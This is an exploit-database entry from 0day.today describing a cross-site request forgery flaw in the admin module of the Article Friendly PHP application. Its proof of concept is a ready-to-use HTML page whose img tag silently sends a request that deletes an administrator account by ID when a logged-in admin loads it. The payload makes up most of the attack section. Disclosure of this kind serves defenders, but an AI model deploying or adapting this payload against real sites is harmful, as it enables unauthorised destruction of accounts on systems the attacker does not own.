[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Article Friendly CSRF Vulnerability

Author
Pratul Agrawal
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11056
Category
web applications
Date add
24-02-2010
Platform
unsorted
===================================
Article Friendly CSRF Vulnerability
===================================

 # Vulnerability found in- Admin module
   
  # company       aksitservices
   
  # Credit by     Pratul Agrawal
  
  # Site p4ge     http://www.articlefriendly.com/
  
  # Plateform     php
  
   
   
  # Proof of concept   #
 
  Targeted URL:  http://server/admin/index.php?filename=adminlogin
  
 
  Script to delete the Admin user through Cross Site request forgery
  
             .  ..................................................................................................................
  
                        <html>
  
                          <body>
  
      <img src=http://server/admin/index.php?filename=adminuser&a=3&adminid=[USER ID] />
  
                          </body>
  
                        </html>
  
  
             .  ..................................................................................................................
  
  
  
  After execution refresh the page and u can see that user having giving ID  get deleted automatically.
 
 
#If you have any questions, comments, or concerns, feel free to contact me.



#  0day.today [2024-12-25]  #